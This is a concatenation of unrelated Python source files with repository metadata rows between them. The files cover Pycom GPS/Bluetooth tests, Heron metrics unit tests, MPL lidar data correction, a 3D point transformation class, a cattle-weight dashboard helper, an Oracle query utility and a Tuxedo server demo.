serialized['message_id'],
CallbackStatus.SUCCESS,
serialized['filter1'],
serialized['filter2'],
serialized['filter3'],
serialized['filter4'],
serialized['lobby_filter_type'],
serialized['lobby_filter_mask_level_type']
)] | 45.206897 | 98 | 0.600305 | 126 | 1,311 | 6.047619 | 0.373016 | 0.070866 | 0.125984 | 0.086614 | 0.227034 | 0.183727 | 0.07874 | 0.07874 | 0 | 0 | 0 | 0.016211 | 0.24714 | 1,311 | 29 | 99 | 45.206897 | 0.755826 | 0 | 0 | 0 | 0 | 0 | 0.237805 | 0.042683 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.111111 | 0.037037 | 0.296296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7efe6c05de80d338bfca806fa7145910c3df316 | 5,969 | py | Python | tests.py | allenc4/Vehicle-GPS-Tracking | 9adf6e8987f52f0a3808f8ac0717390a27b4475c | [
"MIT"
] | null | null | null | tests.py | allenc4/Vehicle-GPS-Tracking | 9adf6e8987f52f0a3808f8ac0717390a27b4475c | [
"MIT"
] | null | null | null | tests.py | allenc4/Vehicle-GPS-Tracking | 9adf6e8987f52f0a3808f8ac0717390a27b4475c | [
"MIT"
] | null | null | null | from lib.pytrack import Pytrack
import machine
import time
import utime
import gc
import pycom
from network import Bluetooth, WLAN
import binascii
from config import ConfigBluetooth, ConfigMqtt, ConfigAccelerometer
from lib.mqtt import MQTTClient
from lib.LIS2HH12 import LIS2HH12
py = Pytrack()
accel = LIS2HH12()
def _decodeBytes(data):
'''
Attempts to decode a byte array to string format. If not a byte type,
just returns the original data
'''
try:
return data.decode()
except (UnicodeDecodeError, AttributeError):
pass
return data
def testGPSLib1():
from lib.L76GNSS import L76GNSS
print("Testing GPS using pytrack L76GNSS library")
L76 = L76GNSS(pytrack=py)
while True:
coord = L76.coordinates()
print("Coordinates: {}, mem: {}".format(coord, gc.mem_free()))
def testGPSLib2():
from lib.L76GNSV4 import L76GNSS
print("Testing GPS using L75GNSV4 library")
py = Pytrack()
L76 = L76GNSS(pytrack=py)
L76.setAlwaysOn()
print("gsv - info about sattelites in view at this moment: ")
# returns the info about sattelites in view at this moment
# even without the gps being fixed
print(L76.gps_message('GSV',debug=True))
input("Press enter to continue")
print("gga - number of sattelites in view at this moment: ")
# returns the number of sattelites in view at this moment
# even without the gps being fixed
print(L76.gps_message('GGA',debug=True)['NumberOfSV'])
input("Press enter to continue")
print("Attempting to get gps fix... This may take some time...")
L76.get_fix(debug=False)
pycom.heartbeat(0)
if L76.fixed():
pycom.rgbled(0x000f00)
else:
pycom.rgbled(0x0f0000)
print("coordinates")
# returns the coordinates
# with debug true you see the messages parsed by the
# library until you get a the gps is fixed
print(L76.coordinates(debug=False))
print(L76.getUTCDateTime(debug=False))
# example using the deepsleep mode of the pytrack
print("Going to deep sleep for 60 seconds (powering down gps)")
machine.idle()
py.setup_sleep(60) # sleep 1 minute
py.go_to_sleep(gps=True)
def scanBluetooth():
bt = Bluetooth()
bt.start_scan(-1) # Start scanning indefinitely until stop_scan() is called
while True:
adv = bt.get_adv()
if adv:
# try to get the complete name
print("BT Name: {}".format(bt.resolve_adv_data(adv.data, Bluetooth.ADV_NAME_CMPL)))
# print out mac address of bluetooth device
print("Mac addr: {}, {}".format(adv.mac, binascii.hexlify(adv.mac)))
else:
time.sleep(0.5)
time.sleep(3)
def isBTDeviceNearby():
bt = Bluetooth()
while True:
print("Scanning for owner BT device nearby...")
bt.start_scan(10) # Scans for 10 seconds
while bt.isscanning():
adv = bt.get_adv()
if adv and binascii.hexlify(adv.mac) == ConfigBluetooth.MAC_ADDR:
try:
print("Owner device found: {} Mac addr {}".format(bt.resolve_adv_data(adv.data, Bluetooth.ADV_NAME_CMPL), ConfigBluetooth.MAC_ADDR))
conn = bt.connect(adv.mac)
time.sleep(0.05)
conn.disconnect()
bt.stop_scan()
except Exception as e:
print("Exception {}".format(e))
bt.stop_scan()
break
else:
time.sleep(0.050)
def testRTC():
time.sleep(2)
rtc = machine.RTC()
print('Current RTC: {}, is synced: {}', rtc.now(), rtc.synced())
rtc.ntp_sync("pool.ntp.org")
utime.sleep_ms(750)
print('Synced time: {}', rtc.now())
# print('Going to sleep')
# time.sleep(1);
# machine.idle()
# py.setup_sleep(10) # sleep 10 seconds
# py.go_to_sleep()
def testMQTT():
mqttClient = None
mqttClient = MQTTClient(ConfigMqtt.CLIENT_ID, ConfigMqtt.SERVER, port=ConfigMqtt.PORT, user=ConfigMqtt.USER, password=ConfigMqtt.PASSWORD)
# Set the callback method that will be invoked on subscription to topics
mqttClient.set_callback(mqttCallback)
mqttClient.connect()
#Subscribe to the disable tracking topic
mqttClient.subscribe(topic=ConfigMqtt.TOPIC_TRACKING_STATE)
time.sleep(0.5)
print("Checking MQTT messages")
mqttClient.check_msg()
print("Messages checked. Going to sleep")
time.sleep(15)
def mqttCallback(topic, msg):
'''
Method to handle callbacks of any mqtt topics that we subscribe to.
For now, only subscribes to bypass topic which is used to disable gps monitoring and accelerometer wakeup detection.
topic - MQTT topic that we are subscribing to and processing the request for
msg - Message received from the topic
'''
print("In MQTT subscription callback")
# Attempt to decode the topic and msg if in byte format
topic = _decodeBytes(topic)
msg = _decodeBytes(msg)
print("{}: {}".format(topic, msg))
def testCurrentDraw():
pycom.heartbeat(False)
for i in range(10):
pycom.rgbled(0x00FF00) #green
time.sleep(1)
pycom.rgbled(0x000000)
time.sleep(1)
# Test deepsleep for 10 seconds with accelerometer wakeup
py.setup_int_wake_up(True, True)
accel.enable_activity_interrupt(
ConfigAccelerometer.INTERRUPT_THRESHOLD, ConfigAccelerometer.INTERRUPT_DURATION)
py.setup_sleep(10)
py.go_to_sleep()
# Ensure we are connected to network
# Check if network is connected. If not, attempt to connect
counter = 0
wlan = WLAN()
while not wlan.isconnected():
# If we surpass some counter timeout and network is still not connected, reset and attempt to connect again
if counter > 100000:
machine.reset()
machine.idle()
counter += 1
#isBTDeviceNearby()
testCurrentDraw() | 30.454082 | 152 | 0.653208 | 770 | 5,969 | 5.002597 | 0.322078 | 0.023364 | 0.016615 | 0.018692 | 0.155763 | 0.132918 | 0.0919 | 0.0919 | 0.063344 | 0.063344 | 0 | 0.027474 | 0.249958 | 5,969 | 196 | 153 | 30.454082 | 0.832924 | 0.244262 | 0 | 0.206349 | 0 | 0 | 0.144434 | 0 | 0 | 0 | 0.00721 | 0 | 0 | 1 | 0.071429 | false | 0.015873 | 0.103175 | 0 | 0.190476 | 0.18254 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f0aa97f2f4c457f1d684b06ee02119ec9dcf44 | 5,480 | py | Python | heron/instance/tests/python/utils/metrics_helper_unittest.py | takeratta/heron | 7b7c38594186f009741c62d379364b9b45d82b61 | [
"Apache-2.0"
] | 1 | 2021-06-29T07:00:10.000Z | 2021-06-29T07:00:10.000Z | heron/instance/tests/python/utils/metrics_helper_unittest.py | kalimfaria/heron | d59bd016b826006e2af22c7a6452342f5e7d637c | [
"Apache-2.0"
] | null | null | null | heron/instance/tests/python/utils/metrics_helper_unittest.py | kalimfaria/heron | d59bd016b826006e2af22c7a6452342f5e7d637c | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2016 Twitter. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=missing-docstring
import unittest
from heronpy.api.metrics import (CountMetric, MultiCountMetric,
MeanReducedMetric, MultiMeanReducedMetric)
from heron.instance.src.python.utils.metrics import BaseMetricsHelper
from heron.proto import metrics_pb2
import heron.instance.tests.python.utils.mock_generator as mock_generator
class BaseMetricsHelperTest(unittest.TestCase):
def setUp(self):
self.metrics = {"metric1": CountMetric(),
"metric2": MultiCountMetric(),
"metric3": MeanReducedMetric(),
"metric4": MultiMeanReducedMetric()}
self.metrics_helper = BaseMetricsHelper(self.metrics)
self.metrics_collector = mock_generator.MockMetricsCollector()
def tearDown(self):
self.metrics = None
self.metrics_helper = None
self.metrics_collector = None
def test_register_metrics(self):
self.metrics_helper.register_metrics(self.metrics_collector, 60)
for name, metric in self.metrics.items():
self.assertEqual(self.metrics_collector.metrics_map[name], metric)
self.assertEqual(len(self.metrics_collector.time_bucket_in_sec_to_metrics_name[60]), 4)
self.assertIn(60, self.metrics_collector.registered_timers)
def test_update_count(self):
self.metrics_helper.update_count("metric1")
self.assertEqual(self.metrics["metric1"].get_value_and_reset(), 1)
self.assertEqual(self.metrics["metric1"].get_value_and_reset(), 0)
self.metrics_helper.update_count("metric1", incr_by=10)
self.assertEqual(self.metrics["metric1"].get_value_and_reset(), 10)
self.metrics_helper.update_count("metric2", key="key1")
self.assertEqual(self.metrics["metric2"].get_value_and_reset(), {"key1": 1})
self.assertEqual(self.metrics["metric2"].get_value_and_reset(), {"key1": 0})
self.metrics_helper.update_count("metric2", incr_by=10, key="key2")
self.assertEqual(self.metrics["metric2"].get_value_and_reset(), {"key1": 0,
"key2": 10})
def test_update_reduced_metric(self):
for i in range(1, 11):
self.metrics_helper.update_reduced_metric("metric3", i)
self.assertEqual(self.metrics["metric3"].get_value_and_reset(), 5.5)
self.assertIsNone(self.metrics["metric3"].get_value_and_reset())
for i in range(1, 11):
self.metrics_helper.update_reduced_metric("metric4", i, key="key1")
self.metrics_helper.update_reduced_metric("metric4", i * 2, key="key2")
self.metrics_helper.update_reduced_metric("metric4", i * 3, key="key3")
self.assertEqual(self.metrics["metric4"].get_value_and_reset(), {"key1": 5.5,
"key2": 11,
"key3": 16.5})
self.assertEqual(self.metrics["metric4"].get_value_and_reset(), {"key1": None,
"key2": None,
"key3": None})
class MetricsCollectorTest(unittest.TestCase):
def setUp(self):
self.metrics_collector = mock_generator.MockMetricsCollector()
def tearDown(self):
self.metrics_collector = None
def test_register_metric(self):
name1 = "metric1"
metric1 = CountMetric()
self.metrics_collector.register_metric(name1, metric1, 60)
self.assertEqual(self.metrics_collector.metrics_map[name1], metric1)
self.assertIn(60, self.metrics_collector.registered_timers)
name2 = "metric2"
metric2 = MeanReducedMetric()
self.metrics_collector.register_metric(name2, metric2, 60)
self.assertEqual(self.metrics_collector.metrics_map[name2], metric2)
self.assertEqual(self.metrics_collector.time_bucket_in_sec_to_metrics_name[60],
[name1, name2])
name3 = "metric3"
metric3 = MultiMeanReducedMetric()
self.metrics_collector.register_metric(name3, metric3, 30)
self.assertEqual(self.metrics_collector.metrics_map[name3], metric3)
self.assertEqual(self.metrics_collector.registered_timers, [60, 30])
# pylint: disable=protected-access
def test_gather_metrics(self):
name = "metric"
metric = CountMetric()
metric.incr(to_add=10)
self.metrics_collector.register_metric(name, metric, 60)
self.assertIn(60, self.metrics_collector.time_bucket_in_sec_to_metrics_name)
self.metrics_collector._gather_metrics(60)
message = self.metrics_collector.out_metrics.poll()
self.assertIsNotNone(message)
self.assertIsInstance(message, metrics_pb2.MetricPublisherPublishMessage)
self.assertEqual(message.metrics[0].name, name)
self.assertEqual(message.metrics[0].value, str(10))
self.assertEqual(metric.get_value_and_reset(), 0)
| 44.918033 | 91 | 0.691058 | 654 | 5,480 | 5.591743 | 0.249235 | 0.138365 | 0.114848 | 0.106645 | 0.502598 | 0.425759 | 0.383374 | 0.303527 | 0.224228 | 0.184031 | 0 | 0.030745 | 0.198723 | 5,480 | 121 | 92 | 45.289256 | 0.802095 | 0.12354 | 0 | 0.139535 | 0 | 0 | 0.050355 | 0 | 0 | 0 | 0 | 0 | 0.290698 | 1 | 0.104651 | false | 0 | 0.05814 | 0 | 0.186047 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f1d9a93cc3b07e5f1b317fe6365a6639b2f656 | 3,309 | py | Python | act/corrections/mpl.py | michaeltg12/ACT | c801ac7ac2762bdc73e1d419bc7c266512d55903 | [
"BSD-3-Clause"
] | null | null | null | act/corrections/mpl.py | michaeltg12/ACT | c801ac7ac2762bdc73e1d419bc7c266512d55903 | [
"BSD-3-Clause"
] | null | null | null | act/corrections/mpl.py | michaeltg12/ACT | c801ac7ac2762bdc73e1d419bc7c266512d55903 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import xarray as xr
import warnings
def correct_mpl(obj):
"""
This procedure corrects MPL data:
1.) Throw out data before laser firing (heights < 0).
2.) Remove background signal.
3.) Afterpulse Correction - Subtraction of (afterpulse-darkcount).
NOTE: Currently the Darkcount in VAPS is being calculated as
the afterpulse at ~30km. But that might not be absolutely
correct and we will likely start providing darkcount profiles
ourselves along with other corrections.
4.) Range Correction.
5.) Overlap Correction (Multiply).
Note: Deadtime and darkcount corrections are not being applied yet.
Parameters
----------
obj : Dataset object
The ACT object.
Returns
-------
obj : Dataset object
The ACT Object containing the corrected values.
"""
# Get some variables before processing begins
act = obj.act
# Overlap Correction Variable
op = obj['overlap_correction'].values[0, :]
op_height = obj['overlap_correction_heights'].values[0, :]
# 1 - Remove negative height data
obj = obj.where(obj.height > 0, drop=True)
height = obj['height'].values
# The drop strips out the ACT data so re-populating
obj.act = act
# Get indices for calculating background
var_names = ['signal_return_co_pol', 'signal_return_cross_pol']
ind = [obj.height.shape[1] - 50, obj.height.shape[1] - 2]
# Subset last gates into new dataset
dummy = obj.isel(range_bins=xr.DataArray(np.arange(ind[0], ind[1])))
# Turn off warnings
warnings.filterwarnings("ignore")
# Run through co and cross pol data for corrections
co_bg = dummy[var_names[0]]
co_bg = co_bg.where(co_bg > -9998.)
co_bg = co_bg.mean(dim='dim_0').values
x_bg = dummy[var_names[1]]
x_bg = x_bg.where(x_bg > -9998.)
x_bg = x_bg.mean(dim='dim_0').values
# Seems to be the fastest way of removing background signal at the moment
co_data = obj[var_names[0]].where(obj[var_names[0]] > 0).values
x_data = obj[var_names[1]].where(obj[var_names[1]] > 0).values
for i in range(len(obj['time'].values)):
co_data[i, :] = co_data[i, :] - co_bg[i]
x_data[i, :] = x_data[i, :] - x_bg[i]
# After Pulse Correction Variable
co_ap = obj['afterpulse_correction_co_pol'].values
x_ap = obj['afterpulse_correction_cross_pol'].values
for j in range(len(obj['range_bins'].values)):
# Afterpulse Correction
co_data[:, j] = co_data[:, j] - co_ap[:, j]
x_data[:, j] = x_data[:, j] - x_ap[:, j]
# R-Squared Correction
co_data[:, j] = co_data[:, j] * height[:, j] ** 2.
x_data[:, j] = x_data[:, j] * height[:, j] ** 2.
# Overlap Correction
idx = (np.abs(op_height - height[0, j])).argmin()
co_data[:, j] = co_data[:, j] * op[idx]
x_data[:, j] = x_data[:, j] * op[idx]
# Create the co/cross ratio variable
ratio = (x_data / co_data) * 100.
obj['cross_co_ratio'] = obj[var_names[0]].copy(data=ratio)
# Convert data to decibels
co_data = 10. * np.log10(co_data)
x_data = 10. * np.log10(x_data)
# Write data to object
obj[var_names[0]].values = co_data
obj[var_names[1]].values = x_data
return obj
| 32.126214 | 77 | 0.631611 | 493 | 3,309 | 4.081136 | 0.312373 | 0.038767 | 0.03827 | 0.023857 | 0.13668 | 0.095427 | 0.023857 | 0 | 0 | 0 | 0 | 0.021446 | 0.239045 | 3,309 | 102 | 78 | 32.441176 | 0.777601 | 0.376247 | 0 | 0 | 0 | 0 | 0.1 | 0.055102 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02381 | false | 0 | 0.071429 | 0 | 0.119048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f2acb039da4ed12afd34efa24f6869f05b942e | 2,547 | py | Python | hilbert3D/Transformation.py | AThom0x7cc/HilbertCurve3D | 67f0067626a72bf30fa3d7b7956e2dd6ca1880fd | [
"Unlicense"
] | null | null | null | hilbert3D/Transformation.py | AThom0x7cc/HilbertCurve3D | 67f0067626a72bf30fa3d7b7956e2dd6ca1880fd | [
"Unlicense"
] | null | null | null | hilbert3D/Transformation.py | AThom0x7cc/HilbertCurve3D | 67f0067626a72bf30fa3d7b7956e2dd6ca1880fd | [
"Unlicense"
] | null | null | null | from .Math import Point, Vector, sin, cos
class Transformation:
def __init__(self, points_generator, spectator, x, y, z, x_angle, y_angle):
self.points_generator = points_generator
self.spectator = spectator
self.start_point = Point(x, y, z)
self.x_angle = x_angle
self.y_angle = y_angle
vector = self.points_generator.center_vector
self.transformed_points_generator = self.generate_transformed_points(self.points_generator,
self.spectator,
vector,
self.start_point,
self.x_angle,
self.y_angle)
def generate_transformed_points(self, points_generator, spectator, vector, start_point, x_angle, y_angle):
for new_point in points_generator:
new_point += vector
new_point = self.rotate_around_y_axis(y_angle, new_point)
new_point = self.rotate_around_x_axis(-x_angle, new_point)
new_point += Vector(start_point)
new_point = self.perspective_view(new_point, spectator)
yield new_point
def __iter__(self):
return self.transformed_points_generator
def __next__(self):
return next(self.transformed_points_generator)
@classmethod
def rotate_around_x_axis(cls, x, point):
point_x, point_y, point_z = point
new_point = Point(point_x * 1 + point_y * 0 + point_z * 0,
point_x * 0 + point_y * cos(x) - point_z * sin(x),
point_x * 0 + point_y * sin(x) + point_z * cos(x))
return new_point
@classmethod
def rotate_around_y_axis(cls, x, point):
point_x, point_y, point_z = point
new_point = Point(point_x * cos(x) + point_y * 0 + point_z * sin(x),
point_x * 0 + point_y * 1 + point_z * 0,
-point_x * sin(x) + point_y * 0 + point_z * cos(x))
return new_point
@classmethod
def perspective_view(cls, point, d):
point_x, point_y, point_z = point
temp = d / (point_z + d)
new_point = Point(point_x * temp, point_y * temp, 0)
return new_point
if __name__ == '__main__':
pass
| 31.444444 | 110 | 0.52925 | 297 | 2,547 | 4.154882 | 0.151515 | 0.103728 | 0.053485 | 0.072934 | 0.431118 | 0.290924 | 0.206645 | 0.188006 | 0.188006 | 0.089141 | 0 | 0.007152 | 0.396152 | 2,547 | 80 | 111 | 31.8375 | 0.795189 | 0 | 0 | 0.183673 | 0 | 0 | 0.003141 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.020408 | 0.020408 | 0.040816 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f2d9623e91d70a0002216c25bb09cde3a87620 | 634 | py | Python | instaweight/dashboard/graph_utils.py | ma02954AteebAhmed/InstaWeight | a1ef58d60cfecb867d78b87adc6df8929216dd10 | [
"Apache-2.0"
] | null | null | null | instaweight/dashboard/graph_utils.py | ma02954AteebAhmed/InstaWeight | a1ef58d60cfecb867d78b87adc6df8929216dd10 | [
"Apache-2.0"
] | 14 | 2020-07-02T09:38:46.000Z | 2022-03-12T00:39:05.000Z | instaweight/dashboard/graph_utils.py | ma02954AteebAhmed/InstaWeight | a1ef58d60cfecb867d78b87adc6df8929216dd10 | [
"Apache-2.0"
] | 1 | 2020-07-02T06:15:50.000Z | 2020-07-02T06:15:50.000Z | from dashboard.models import *
from datetime import datetime
def weight_distribution():
distribution ={
'over_weight':0,
'under_weight':0,
'normal':0
}
cattle_objs = Cattle.objects.all()
for cattle in cattle_objs:
weight = DailyWeight.objects.all().order_by('date_time').last()
birth_date = cattle.birth_date
today = datetime.now().date()
age_months = (today.year - birth_date.year)*12
age_range = AgeRange.objects.filter(start_range__gte=age_months,end_range__lte=age_months+6)
print(age_months, age_range)
return distribution
| 21.133333 | 100 | 0.659306 | 79 | 634 | 5.012658 | 0.518987 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012397 | 0.236593 | 634 | 29 | 101 | 21.862069 | 0.805785 | 0 | 0 | 0 | 0 | 0 | 0.060413 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.117647 | 0 | 0.235294 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f45c55026658b0532488333c31cecec15af687 | 6,929 | py | Python | appbak/create_execute.py | Linyameng/alphadata-dev | 7a48c9ddf24442a89f3f8ab1ba78e573c8844f26 | [
"Apache-2.0"
] | null | null | null | appbak/create_execute.py | Linyameng/alphadata-dev | 7a48c9ddf24442a89f3f8ab1ba78e573c8844f26 | [
"Apache-2.0"
] | null | null | null | appbak/create_execute.py | Linyameng/alphadata-dev | 7a48c9ddf24442a89f3f8ab1ba78e573c8844f26 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on 2018/5/31
@author: xing yan
"""
from sqlalchemy import create_engine, Table
from sqlalchemy import MetaData
from sqlalchemy.sql import text
from sqlalchemy.exc import NoSuchTableError
from collections import OrderedDict
class OracleEngine:
"""create oracle engine.
oracle_tms_dict = {'drivername': 'oracle+cx_oracle', 'host': '192.168.220.119',
'database': 'hbqa', 'password': 'howbuy2016', 'port': 1521}
oracle_tp_dict = {'drivername': 'oracle+cx_oracle', 'host': '192.168.220.126',
'password': 'howbuy2016', 'database': 'hbqa', 'port': 1521}
"""
oracle_url = 'oracle+cx_oracle://{username}:{password}@{dialect}'
query_all_tab_sql = "SELECT * from {tab_name}"
query_sql = "SELECT * from {tab_name} where {column_name} like :column_name"
tab_comments_sql = "SELECT COMMENTS FROM USER_TAB_COMMENTS WHERE TABLE_NAME like :tab_name"
def __init__(self, username, db_info):
self.engine = create_engine(self.oracle_url.format(username=username, password=db_info.db_password, dialect=db_info.tms_dsn))
self.metadata = MetaData(bind=self.engine)
def tab_metadata(self, tables):
tabs = []
for tab in tables:
try:
tabs.append(Table(tab, self.metadata, autoload=True))
except NoSuchTableError:
continue
return OrderedDict([(tab.description, tab) for tab in tabs])
def execute(self, sql, **kwargs):
with self.engine.begin() as connect:
return connect.execute(text(sql), **kwargs)
def with_execute(self, tables, value=None):
metadata = self.tab_metadata(tables.keys())
tables_data = []
with self.engine.begin() as connect:
for tab in metadata.keys():
tab_comment = self.get_tab_comment(tab)
if tables[tab] is None or value is None:
result = connect.execute(text(self.query_all_tab_sql.format(tab_name=tab)))
else:
result = connect.execute(text(self.query_sql.format(tab_name=tab, column_name=tables[tab])),
column_name=value if value != '' else '%%')
col_comments = self.get_col_comments(result, tab=tab)
tab_map = OrderedDict(tab_name=tab, tab_comment=tab_comment, columns=result.keys(),
col_comments=col_comments, data=result.fetchall())
tables_data.append(tab_map)
return tables_data
def sql_execute(self, sql, **kwargs):
tables_data = []
with self.engine.begin() as connect:
result = connect.execute(text(sql), kwargs)
""" col_comments = self.get_col_comments(result)"""
tables_data.append(OrderedDict(columns=result.keys(), data=result.fetchall()))
return tables_data
def many_execute(self, tables, **kwargs):
metadata = self.tab_metadata(tables)
tables_data = []
with self.engine.begin() as connect:
for tab in metadata:
sql = self.sql_format(tab, op='LIKE')
result = connect.execute(text(sql), **kwargs)
tables_data.append(OrderedDict(tab_name=tab, columns=result.keys(), data=result.fetchall()))
return tables_data
def comments_execute(self, tables, **kwargs):
self.tab_metadata(tables.keys())
tables_data = []
with self.engine.begin() as connect:
for tab in tables.keys():
sql = self.sql_format(tables, tab, op='LIKE')
result = connect.execute(text(sql), **kwargs)
tables_data.append(OrderedDict(tab_name=tab, columns=result.keys(), data=result.fetchall()))
return tables_data
def get_tab_comment(self, tab):
result = self.execute(self.tab_comments_sql, tab_name=tab.upper()).fetchone()
return result[0]
def get_col_comments(self, result, tab=None):
return self._query_col_comments(result.keys(), tab=tab)
@staticmethod
def sql_format(tables: dict, tab, op='=', key='AND'):
sql = "SELECT * FROM {tab_name} {field}"
if tables.get(tab) is None:
return sql.format(table_name=tab, where_field='')
col = tables.get(tab)
col_part_sql = ' 1=1 '
if isinstance(col, str):
col_part_sql = " {col} {op} :{value} ".format(col=col, op=op, value=col.lower())
if isinstance(col, list):
col_part = []
for col in tables.get(tab):
col_part.append(" {col} {op} :{value} ".format(col=col, op=op, value=col.lower()))
col_part_sql = key.join(col_part)
field_sql = 'WHERE {part_sql}'.format(part_sql=col_part_sql)
return sql.format(tab_name=tab, field=field_sql)
def _query_col_comments(self, cols, tab=None):
all_col_comments_sql = "SELECT COMMENTS FROM USER_COL_COMMENTS WHERE COLUMN_NAME = :col_name AND COMMENTS IS NOT NULL"
user_col_comments_sql = "SELECT COMMENTS FROM USER_COL_COMMENTS WHERE TABLE_NAME = :tab_name " \
"AND COLUMN_NAME = :col_name "
with self.engine.begin() as connect:
col_comments = []
for col in cols:
print(col.upper())
if tab is None:
result = connect.execute(text(all_col_comments_sql), col_name=col.upper())
else:
result = connect.execute(text(user_col_comments_sql), tab_name=tab.upper(), col_name=col.upper())
col_comment = result.fetchone()[0]
if col_comment is not None:
col_comment = col_comment[:35]
else:
col_comment = '空'
col_comments.append(col_comment)
return col_comments
def update_business_batch_flow(self, trade_dt, sys_code):
batch_sql = "UPDATE business_batch_flow f SET f.batch_stat='2' WHERE f.trade_dt =:trade_dt AND f.sys_code =:sys_code"
with self.engine.begin() as connect:
connect.execute(text(batch_sql), trade_dt=trade_dt, sys_code=sys_code)
if __name__ == '__main__':
"""
tables = {
'USER_TAB_COMMENTS': ['TABLE_NAME', 'COMMENTS'],
'USER_COL_COMMENTS': ['TABLE_NAME', 'COLUMN_NAME', 'COMMENTS']
}
table_info = {'table':'USER_TAB_COMMENTS', 'column':['TABLE_NAME', 'COMMENTS'], 'key':'or'}
SELECT * FROM USER_TAB_COMMENTS T WHERE T.TABLE_NAME LIKE '' OR T.COMMENTS LIKE '';
SELECT * FROM USER_COL_COMMENTS C WHERE C.TABLE_NAME LIKE '' OR C.COLUMN_NAME OR C.COMMENTS LIKE '';
"""
table_info = {'table_name': 'USER_TAB_COMMENTS', 'columns': ['TABLE_NAME', 'COMMENTS'], 'key': 'or'}
| 39.821839 | 133 | 0.603983 | 861 | 6,929 | 4.630662 | 0.156794 | 0.055179 | 0.040632 | 0.033358 | 0.374969 | 0.300978 | 0.22473 | 0.207173 | 0.197642 | 0.177076 | 0 | 0.010963 | 0.275942 | 6,929 | 173 | 134 | 40.052023 | 0.783735 | 0.057728 | 0 | 0.2 | 0 | 0.009091 | 0.112674 | 0.008371 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109091 | false | 0.018182 | 0.045455 | 0.009091 | 0.3 | 0.009091 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f511c69e170794f72c6930c930fe7875bcc4cc | 512 | py | Python | demo/db.py | uldisa/tuxedo-python | 59bd44ee9be1807b63599b48b3af9b4dc4ac4277 | [
"MIT"
] | 4 | 2019-11-05T17:44:29.000Z | 2022-03-21T08:51:14.000Z | demo/db.py | uldisa/tuxedo-python | 59bd44ee9be1807b63599b48b3af9b4dc4ac4277 | [
"MIT"
] | 3 | 2020-12-15T19:39:38.000Z | 2021-11-22T20:54:13.000Z | demo/db.py | uldisa/tuxedo-python | 59bd44ee9be1807b63599b48b3af9b4dc4ac4277 | [
"MIT"
] | 4 | 2020-12-13T17:02:21.000Z | 2021-12-15T22:46:00.000Z | #!/usr/bin/env python3
import sys
import tuxedo as t
import cx_Oracle
class Server:
def tpsvrinit(self, args):
t.userlog('Server startup')
self.db = cx_Oracle.connect(handle=t.xaoSvcCtx())
t.tpadvertise('DB')
return 0
def DB(self, args):
dbc = self.db.cursor()
dbc.execute('insert into pymsg(msg) values (:1)', ['Hello from python'])
return t.tpreturn(t.TPSUCCESS, 0, args)
if __name__ == '__main__':
t.run(Server(), sys.argv, 'Oracle_XA')
